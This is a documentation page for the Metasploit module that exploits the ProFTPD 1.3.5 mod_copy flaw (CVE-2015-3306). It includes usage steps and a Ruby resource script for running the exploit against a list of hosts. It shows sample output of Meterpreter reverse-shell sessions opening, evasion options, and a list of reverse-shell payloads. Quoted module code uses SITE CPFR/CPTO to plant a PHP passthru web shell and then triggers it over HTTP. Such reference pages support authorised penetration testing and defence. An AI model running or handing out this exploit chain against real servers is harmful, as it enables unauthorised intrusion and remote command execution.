ProFTPD 1.3.5 Mod_Copy Command Execution - Metasploit


This page contains detailed information about how to use the exploit/unix/ftp/proftpd_modcopy_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: ProFTPD 1.3.5 Mod_Copy Command Execution
Module: exploit/unix/ftp/proftpd_modcopy_exec
Source code: modules/exploits/unix/ftp/proftpd_modcopy_exec.rb
Disclosure date: 2015-04-22
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): cmd
Supported platform(s): Unix
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2015-3306

This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination. The copy commands are executed with the rights of the ProFTPD service, which by default runs under the privileges of the 'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website directory, PHP remote code execution is made possible.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


Using proftpd_modcopy_exec against a single host

Normally, you can use exploit/unix/ftp/proftpd_modcopy_exec this way:

msf > use exploit/unix/ftp/proftpd_modcopy_exec
msf exploit(proftpd_modcopy_exec) > show targets
    ... a list of targets ...
msf exploit(proftpd_modcopy_exec) > set TARGET target-id
msf exploit(proftpd_modcopy_exec) > show options
    ... show and set options ...
msf exploit(proftpd_modcopy_exec) > exploit

Using proftpd_modcopy_exec against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your proftpd_modcopy_exec will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/unix/ftp/proftpd_modcopy_exec")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the unix/ftp/proftpd_modcopy_exec exploit module looks in the msfconsole:

msf6 > use exploit/unix/ftp/proftpd_modcopy_exec

msf6 exploit(unix/ftp/proftpd_modcopy_exec) > show info

       Name: ProFTPD 1.3.5 Mod_Copy Command Execution
     Module: exploit/unix/ftp/proftpd_modcopy_exec
   Platform: Unix
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2015-04-22

Provided by:
  Vadim Melihow
  xistence <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   ProFTPD 1.3.5

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80               yes       HTTP port (TCP)
  RPORT_FTP  21               yes       FTP port
  SITEPATH   /var/www         yes       Absolute writable website path
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       Base path to the website
  TMPPATH    /tmp             yes       Absolute writable path
  VHOST                       no        HTTP server virtual host

Payload information:
  Avoid: 0 characters

Description:
  This module exploits the SITE CPFR/CPTO commands in ProFTPD version 
  1.3.5. Any unauthenticated client can leverage these commands to 
  copy files from any part of the filesystem to a chosen destination. 
  The copy commands are executed with the rights of the ProFTPD 
  service, which by default runs under the privileges of the 'nobody' 
  user. By using /proc/self/cmdline to copy a PHP payload to the 
  website directory, PHP remote code execution is made possible.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2015-3306
  https://www.exploit-db.com/exploits/36742

Module Options


This is a complete list of options available in the unix/ftp/proftpd_modcopy_exec exploit:

msf6 exploit(unix/ftp/proftpd_modcopy_exec) > show options

Module options (exploit/unix/ftp/proftpd_modcopy_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       HTTP port (TCP)
   RPORT_FTP  21               yes       FTP port
   SITEPATH   /var/www         yes       Absolute writable website path
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path to the website
   TMPPATH    /tmp             yes       Absolute writable path
   VHOST                       no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   ProFTPD 1.3.5

Advanced Options


Here is a complete list of advanced options supported by the unix/ftp/proftpd_modcopy_exec exploit:

msf6 exploit(unix/ftp/proftpd_modcopy_exec) > show advanced

Module advanced options (exploit/unix/ftp/proftpd_modcopy_exec):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   CHOST                                                                       no        The local client address
   CPORT                                                                       no        The local client port
   ConnectTimeout          10                                                  yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   SSLCipher                                                                   no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode           PEER                                                no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Exploit Targets


Here is a list of targets (platforms and systems) which the unix/ftp/proftpd_modcopy_exec module can exploit:

msf6 exploit(unix/ftp/proftpd_modcopy_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   ProFTPD 1.3.5

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the unix/ftp/proftpd_modcopy_exec exploit:

msf6 exploit(unix/ftp/proftpd_modcopy_exec) > show payloads

Compatible Payloads
===================

   #  Name                                 Disclosure Date  Rank    Check  Description
   -  ----                                 ---------------  ----    -----  -----------
   0  payload/cmd/unix/bind_awk                             normal  No     Unix Command Shell, Bind TCP (via AWK)
   1  payload/cmd/unix/bind_perl                            normal  No     Unix Command Shell, Bind TCP (via Perl)
   2  payload/cmd/unix/bind_perl_ipv6                       normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   3  payload/cmd/unix/generic                              normal  No     Unix Command, Generic Command Execution
   4  payload/cmd/unix/reverse_awk                          normal  No     Unix Command Shell, Reverse TCP (via AWK)
   5  payload/cmd/unix/reverse_perl                         normal  No     Unix Command Shell, Reverse TCP (via Perl)
   6  payload/cmd/unix/reverse_perl_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   7  payload/cmd/unix/reverse_python                       normal  No     Unix Command Shell, Reverse TCP (via Python)
   8  payload/cmd/unix/reverse_python_ssl                   normal  No     Unix Command Shell, Reverse TCP SSL (via python)

Evasion Options


Here is the full list of possible evasion options supported by the unix/ftp/proftpd_modcopy_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(unix/ftp/proftpd_modcopy_exec) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
   TCP::max_send_size            0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay               0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<RHOST>:<FTP_PORT> - Failed to connect to FTP server


Here is a relevant code snippet related to the "<RHOST>:<FTP_PORT> - Failed to connect to FTP server" error message:

63:	  def check
64:	    ftp_port = datastore['RPORT_FTP']
65:	    sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port)
66:	
67:	    if sock.nil?
68:	      fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server")
69:	    else
70:	      print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
71:	    end
72:	
73:	    res = sock.get_once(-1, 10)

<RHOST>:<FTP_PORT> - Failure retrieving ProFTPD 220 OK banner


Here is a relevant code snippet related to the "<RHOST>:<FTP_PORT> - Failure retrieving ProFTPD 220 OK banner" error message:

70:	      print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
71:	    end
72:	
73:	    res = sock.get_once(-1, 10)
74:	    unless res && res.include?('220')
75:	      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
76:	    end
77:	
78:	    sock.puts("SITE CPFR /etc/passwd\r\n")
79:	    res = sock.get_once(-1, 10)
80:	    if res && res.include?('350')

<RHOST>:<FTP_PORT> - Failed to connect to FTP server


Here is a relevant code snippet related to the "<RHOST>:<FTP_PORT> - Failed to connect to FTP server" error message:

90:	    payload_name = rand_text_alphanumeric(5+rand(3)) + '.php'
91:	
92:	    sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port)
93:	
94:	    if sock.nil?
95:	      fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server")
96:	    else
97:	      print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
98:	    end
99:	
100:	    res = sock.get_once(-1, 10)

<RHOST>:<FTP_PORT> - Failure retrieving ProFTPD 220 OK banner


Here is a relevant code snippet related to the "<RHOST>:<FTP_PORT> - Failure retrieving ProFTPD 220 OK banner" error message:

97:	      print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
98:	    end
99:	
100:	    res = sock.get_once(-1, 10)
101:	    unless res && res.include?('220')
102:	      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
103:	    end
104:	
105:	    print_status("#{rhost}:#{ftp_port} - Sending copy commands to FTP server")
106:	
107:	    sock.puts("SITE CPFR /proc/self/cmdline\r\n")

<RHOST>:<FTP_PORT> - Failure copying from /proc/self/cmdline


Here is a relevant code snippet related to the "<RHOST>:<FTP_PORT> - Failure copying from /proc/self/cmdline" error message:

105:	    print_status("#{rhost}:#{ftp_port} - Sending copy commands to FTP server")
106:	
107:	    sock.puts("SITE CPFR /proc/self/cmdline\r\n")
108:	    res = sock.get_once(-1, 10)
109:	    unless res && res.include?('350')
110:	      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from /proc/self/cmdline")
111:	    end
112:	
113:	    sock.put("SITE CPTO #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
114:	    res = sock.get_once(-1, 10)
115:	    unless res && res.include?('250')

<RHOST>:<FTP_PORT> - Failure copying to temporary payload file


Here is a relevant code snippet related to the "<RHOST>:<FTP_PORT> - Failure copying to temporary payload file" error message:

111:	    end
112:	
113:	    sock.put("SITE CPTO #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
114:	    res = sock.get_once(-1, 10)
115:	    unless res && res.include?('250')
116:	      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying to temporary payload file")
117:	    end
118:	
119:	    sock.put("SITE CPFR #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
120:	    res = sock.get_once(-1, 10)
121:	    unless res && res.include?('350')

<RHOST>:<FTP_PORT> - Failure copying from temporary payload file


Here is a relevant code snippet related to the "<RHOST>:<FTP_PORT> - Failure copying from temporary payload file" error message:

117:	    end
118:	
119:	    sock.put("SITE CPFR #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
120:	    res = sock.get_once(-1, 10)
121:	    unless res && res.include?('350')
122:	      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from temporary payload file")
123:	    end
124:	
125:	    sock.put("SITE CPTO #{datastore['SITEPATH']}/#{payload_name}\r\n")
126:	    res = sock.get_once(-1, 10)
127:	    unless res && res.include?('250')

<RHOST>:<FTP_PORT> - Failure copying PHP payload to website path, directory not writable?


Here is a relevant code snippet related to the "<RHOST>:<FTP_PORT> - Failure copying PHP payload to website path, directory not writable?" error message:

123:	    end
124:	
125:	    sock.put("SITE CPTO #{datastore['SITEPATH']}/#{payload_name}\r\n")
126:	    res = sock.get_once(-1, 10)
127:	    unless res && res.include?('250')
128:	      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying PHP payload to website path, directory not writable?")
129:	    end
130:	
131:	    sock.close
132:	
133:	    print_status("Executing PHP payload #{target_uri.path}#{payload_name}")

<RHOST>:<FTP_PORT> - Failure executing payload


Here is a relevant code snippet related to the "<RHOST>:<FTP_PORT> - Failure executing payload" error message:

134:	    res = send_request_cgi!(
135:	      'uri' => normalize_uri(target_uri.path, payload_name),
136:	      'method' => 'GET',
137:	      'vars_get' => { get_arg => "nohup #{payload.encoded} &" }
138:	    )
139:	
140:	    unless res && res.code == 200
141:	      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure executing payload")
142:	    end
143:	  end
144:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Vadim Melihow
  • xistence <xistence[at]0x90.nl>

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.